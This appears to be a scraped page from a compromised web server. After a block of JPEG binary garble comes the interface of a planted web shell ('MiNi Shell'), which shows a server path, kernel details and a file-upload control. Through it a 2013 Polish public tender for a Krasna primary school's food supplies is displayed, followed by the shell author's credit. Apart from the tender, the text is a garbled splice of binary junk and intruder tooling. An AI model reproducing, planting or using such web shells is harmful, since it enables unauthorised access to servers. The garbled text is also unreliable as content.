JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130827/170591-N-2013.html

<p class="kh_header"><b>Krasna: Sukcesywna  dostawa i zakup artykułów żywnościowych  
dla Publicznej Szkoły Podstawowej im. Polskich Olimpijczyków w Krasnej  ZADANIE  I.</b><br>
<b>Numer ogłoszenia: 170591 - 2013; data zamieszczenia: 27.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Publiczna Szkoła Podstawowa w Krasnej , Krasna 53, 26-220 Krasna, woj. świętokrzyskie, tel. 41 371 10 24, faks 41 371 10 24.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.staporkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna  dostawa i zakup artykułów żywnościowych  
dla Publicznej Szkoły Podstawowej im. Polskich Olimpijczyków w Krasnej  ZADANIE  I..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część A Pieczywo i wyroby cukiernicze   CHLEB, bez konserwantów i polepszaczy, krojony,600 g szt.800, BUŁKA CZERSTWA szt. 200, BUŁKA TARTA, opakowanie 500 g szt. 200,

Część B  Ryby i mrożonki  FILET Z MINTAJA bez skóry, mrożony płaty kg 140

Część C Warzywa i owoce świeże  JAJA KONSUMPCYJNE KURZE, świeże szt.2200,  OGÓREK KISZONY w naturalnym kwasie z koprem i solą, opakowanie wiaderko plastikowe  3 000 g szt.180,  PAPRYKA ŚWIEŻA różne kolory kg 30,  CEBULA BIAŁA (bez szczypioru), wielkość średnia, kg 225, MARCHEW KAROTKA, wielkość średnia, bez naci, kg 600, PIETRUSZKA korzeń kg 200, POR szt 250, SELER KORZENIOWY kg 80, PIECZARKI ŚWIEŻE kg 70, KAPUSTA KISZONA BIAŁA, nie przekwaszona, opakowanie wiaderko plastikowe 5 000g szt. 60, KAPUSTA BIAŁA główka kg 250, BURAKI CZERWONE, konsumpcyjne, bez liści, wielkość średnia, kg 125, KAPUSTA PEKIŃSKA (foliowana) kg 100, KOPER I NATKA PIETRUSZKI, świeże w pęczkach, szt. 800, ZIEMNIAKI Lord  kg 3000, GROCH ŁUSKANY, opakowanie paczka 500 g szt.100, KALAFIOR (min. 800g) szt100, POMIDORY kg 125, BROKUŁY, różyczki, świeże kg 20, FASOLKA SZPARAGOWA, świeża kg 80, BRUKSELKA, świeża, kg25. KAPUSTA WŁOSKA, główka, świeża(min. 800g)  szt.40,OGÓRKI ŚWIEŻE średniej wielkości kg 90, RZODKIEWKA pęczek, szt 50, SZPINAK świeży, kg10

Część D Mięso i wędliny BOCZEK WĘDZONY PARZONY kg 80, KIEŁBASA PODWAWELSKA kg.80,  ŁOPATKA WIEPRZOWA BEZ KOŚCI  kg.450,  FILET Z KURCZAKA kg300, ĆWIARTKA Z KURCZAKA kg220,  SCHAB BEZ KOŚCI kg 70, KURCZAKI kg 500, UDZIEC Z KURCZAKA BEZ KOŚCI kg 90, SKRZYDEŁKA Z KURCZAKA kg 40, PODUDZIE Z KURCZAKA kg 80, PODGARLE WIEPRZOWE WĘDZONE kg 20, ANTRYKOT WOŁOWY kg 10, SŁONINA bez skóry, kg 20, WĄTROBA  DROBIOWA, kg 40.
Część  E Produkty ogólnospożywcze SER ŻÓŁTY TYPU GOUDA blok kg.40, TWARÓG MIELONY, opakowanie wiaderko plastikowe 1000 ml. op. 40, ŚMIETANA TYPU KONECKA 24%, kubek 400 ml. szt. 1000, SEREK TOPIONY TYPU GOUDA 100g  szt. 200, MARGARYNA typu Kasia 250g, szt 50, MASŁO typu koneckie, 250g, szt 80, MLEKO 2% opakowanie butelka 1000 ml, l.20, ŚMIETANA  30%, op. 500 ml, szt. 20,   SÓL  JODOWANA kg 125, MĄKA POZNAŃSKA, opakowanie papierowe 1000g, kg 200, PRZYPRAWA DO ZUP TYPU MAGGI opakowanie butelka 1000 ml szt.60, PIEPRZ CZARNY MIELONY, opakowanie 20g szt. 200, PRZYPRAWA TYPU VEGETA, opakowanie  1000g, zawierająca min. 15% suszonych warzyw szt. 60, RYŻ BIAŁY DŁUGOZIARNISTY SYPKI, opakowanie torba papierowa 1000g, kg60, GROSZEK KONSERWOWY  puszka 400 g  szt.30, BARSZCZ BIAŁY TYPU WINIARY, opakowanie torebka 66 g, szt.200, MAJERANEK SUSZONY opakowanie 8 g.szt.200, CZOSNEK GRANULOWANY op.6g. szt.200, FASOLA TYPU JAŚ, opakowanie 500 g szt. 25, OLEJ TYPU KUJAWSKI z pierwszego tłoczenia, opakowanie butelka 1 litr l.230, BARSZCZ CZERWONY TYPU WINIARY, opakowanie torebka 66 g, szt.60, PAPRYKA MIELONA SŁODKA, opakowanie 20g szt. 230, CHRZAN TARTY typu polonaise, słoik 200 g, szt. 40, KASZA JĘCZMIENNA extra, mazurska opakowanie 1000 g, kg 70, MĄKA ZIEMNIACZANA, superior,  opakowanie papierowe 500g szt. 100, LIŚĆ LAUROWY opakowanie 6 g szt. 150, ZIELE ANGIELSKIE opakowanie 8g. szt.150. PRZYPRAWA DO MIĘS typu delikat  knorr, opakowanie torebka20 g szt.100,   ZUPA BOROWIKOWA typu Winiary opakowanie 66 g szt.100, ZUPA PIECZARKOWA typu Winiary opakowanie 66 g szt.100, MAJONEZ typu Kielecki słoik 700 ml. szt. 60, MAKARON ZACIERKA, opakowanie 250g,  jajeczny szt. 130, KUKURYDZA KONSERWOWA puszka 450g  szt.50, SZCZAW PRZECIER, słoik 320 g szt. 70, MAKARON NITKI TYPU LUBELLA typu Goldmak opakowanie 250 g. szt. 100, MAKARON TYPU LUBELLA RÓŻNE FORMY, opakowanie 500 g szt. 300, KONCENTRAT POMIDOROWY TYPU PUDLISZKI opakowanie słoik  200 g, pasteryzowany szt. 200 , PRZYPRAWA GYROS, 30g. szt 100, STAROPOLSKA PRZYPRAWA DO KURCZAKA, szt100, PRZYPRAWA DO RYB 20g, szt30, MUSZTARDA typu kielecka, słoik 200g, szt 40, DŻEM OWOCOWY typu Łowicz, słoik350ml,szt30, CURRY op.20g, szt 40, SOS SAŁATKOWY torebka 9g, szt 100, BAZYLIA torebka 20 g, szt40, OREGANO torebka 20 g, szt 40..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z projektem umowy stanowiącym załącznik nr 5 do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.staporkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiajacego
Publiczna Szkoła Podstawowa  im. Polskich Olimpijczyków w Krasnej, Krasna 53 , 26-220 Stąporków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.09.2013 godzina 10:00, miejsce: Siedziba Zamawiajacego sekretariat 
Publicznej Szkoły Podstawowej  im. Polskich Olimpijczyków w Krasnej, Krasna 53 , 26-220 Stąporków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część A
Pieczywo i wyroby cukiernicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CHLEB, bez konserwantów i polepszaczy, krojony,600 g szt.800, BUŁKA CZERSTWA szt. 200, BUŁKA TARTA, opakowanie 500 g szt. 200,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część B  Ryby i mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> FILET Z MINTAJA bez skóry, mrożony płaty kg 140.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część C Warzywa i owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> JAJA KONSUMPCYJNE KURZE, świeże szt.2200,  OGÓREK KISZONY w naturalnym kwasie z koprem i solą, opakowanie wiaderko plastikowe  3 000 g szt.180,  PAPRYKA ŚWIEŻA różne kolory kg 30,  CEBULA BIAŁA (bez szczypioru), wielkość średnia, kg 225, MARCHEW KAROTKA, wielkość średnia, bez naci, kg 600, PIETRUSZKA korzeń kg 200, POR szt 250, SELER KORZENIOWY kg 80, PIECZARKI ŚWIEŻE kg 70, KAPUSTA KISZONA BIAŁA, nie przekwaszona, opakowanie wiaderko plastikowe 5 000g szt. 60, KAPUSTA BIAŁA główka kg 250, BURAKI CZERWONE, konsumpcyjne, bez liści, wielkość średnia, kg 125, KAPUSTA PEKIŃSKA (foliowana) kg 100, KOPER I NATKA PIETRUSZKI, świeże w pęczkach, szt. 800, ZIEMNIAKI Lord  kg 3000, GROCH ŁUSKANY, opakowanie paczka 500 g szt.100, KALAFIOR (min. 800g) szt100, POMIDORY kg 125, BROKUŁY, różyczki, świeże kg 20, FASOLKA SZPARAGOWA, świeża kg 80, BRUKSELKA, świeża, kg25. KAPUSTA WŁOSKA, główka, świeża(min. 800g)  szt.40,OGÓRKI ŚWIEŻE średniej wielkości kg 90, RZODKIEWKA pęczek, szt 50, SZPINAK świeży, kg10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część D Mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> BOCZEK WĘDZONY PARZONY kg 80, KIEŁBASA PODWAWELSKA kg.80,  ŁOPATKA WIEPRZOWA BEZ KOŚCI  kg.450,  FILET Z KURCZAKA kg300, ĆWIARTKA Z KURCZAKA kg220,  SCHAB BEZ KOŚCI kg 70, KURCZAKI kg 500, UDZIEC Z KURCZAKA BEZ KOŚCI kg 90, SKRZYDEŁKA Z KURCZAKA kg 40, PODUDZIE Z KURCZAKA kg 80, PODGARLE WIEPRZOWE WĘDZONE kg 20, ANTRYKOT WOŁOWY kg 10, SŁONINA bez skóry, kg 20, WĄTROBA  DROBIOWA, kg 40..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część  E Produkty ogólnospożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SER ŻÓŁTY TYPU GOUDA blok kg.40, TWARÓG MIELONY, opakowanie wiaderko plastikowe 1000 ml. op. 40, ŚMIETANA TYPU KONECKA 24%, kubek 400 ml. szt. 1000, SEREK TOPIONY TYPU GOUDA 100g  szt. 200, MARGARYNA typu Kasia 250g, szt 50, MASŁO typu koneckie, 250g, szt 80, MLEKO 2% opakowanie butelka 1000 ml, l.20, ŚMIETANA  30%, op. 500 ml, szt. 20,   SÓL  JODOWANA kg 125, MĄKA POZNAŃSKA, opakowanie papierowe 1000g, kg 200, PRZYPRAWA DO ZUP TYPU MAGGI opakowanie butelka 1000 ml szt.60, PIEPRZ CZARNY MIELONY, opakowanie 20g szt. 200, PRZYPRAWA TYPU VEGETA, opakowanie  1000g, zawierająca min. 15% suszonych warzyw szt. 60, RYŻ BIAŁY DŁUGOZIARNISTY SYPKI, opakowanie torba papierowa 1000g, kg60, GROSZEK KONSERWOWY  puszka 400 g  szt.30, BARSZCZ BIAŁY TYPU WINIARY, opakowanie torebka 66 g, szt.200, MAJERANEK SUSZONY opakowanie 8 g.szt.200, CZOSNEK GRANULOWANY op.6g. szt.200, FASOLA TYPU JAŚ, opakowanie 500 g szt. 25, OLEJ TYPU KUJAWSKI z pierwszego tłoczenia, opakowanie butelka 1 litr l.230, BARSZCZ CZERWONY TYPU WINIARY, opakowanie torebka 66 g, szt.60, PAPRYKA MIELONA SŁODKA, opakowanie 20g szt. 230, CHRZAN TARTY typu polonaise, słoik 200 g, szt. 40, KASZA JĘCZMIENNA extra, mazurska opakowanie 1000 g, kg 70, MĄKA ZIEMNIACZANA, superior,  opakowanie papierowe 500g szt. 100, LIŚĆ LAUROWY opakowanie 6 g szt. 150, ZIELE ANGIELSKIE opakowanie 8g. szt.150. PRZYPRAWA DO MIĘS typu delikat  knorr, opakowanie torebka20 g szt.100,   ZUPA BOROWIKOWA typu Winiary opakowanie 66 g szt.100, ZUPA PIECZARKOWA typu Winiary opakowanie 66 g szt.100, MAJONEZ typu Kielecki słoik 700 ml. szt. 60, MAKARON ZACIERKA, opakowanie 250g,  jajeczny szt. 130, KUKURYDZA KONSERWOWA puszka 450g  szt.50, SZCZAW PRZECIER, słoik 320 g szt. 70, MAKARON NITKI TYPU LUBELLA typu Goldmak opakowanie 250 g. szt. 100, MAKARON TYPU LUBELLA RÓŻNE FORMY, opakowanie 500 g szt. 300, KONCENTRAT POMIDOROWY TYPU PUDLISZKI opakowanie słoik  200 g, pasteryzowany szt. 200 , PRZYPRAWA GYROS, 30g. szt 100, STAROPOLSKA PRZYPRAWA DO KURCZAKA, szt100, PRZYPRAWA DO RYB 20g, szt30, MUSZTARDA typu kielecka, słoik 200g, szt 40, DŻEM OWOCOWY typu Łowicz, słoik350ml,szt30, CURRY op.20g, szt 40, SOS SAŁATKOWY torebka 9g, szt 100, BAZYLIA torebka 20 g, szt40, OREGANO torebka 20 g, szt 40..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com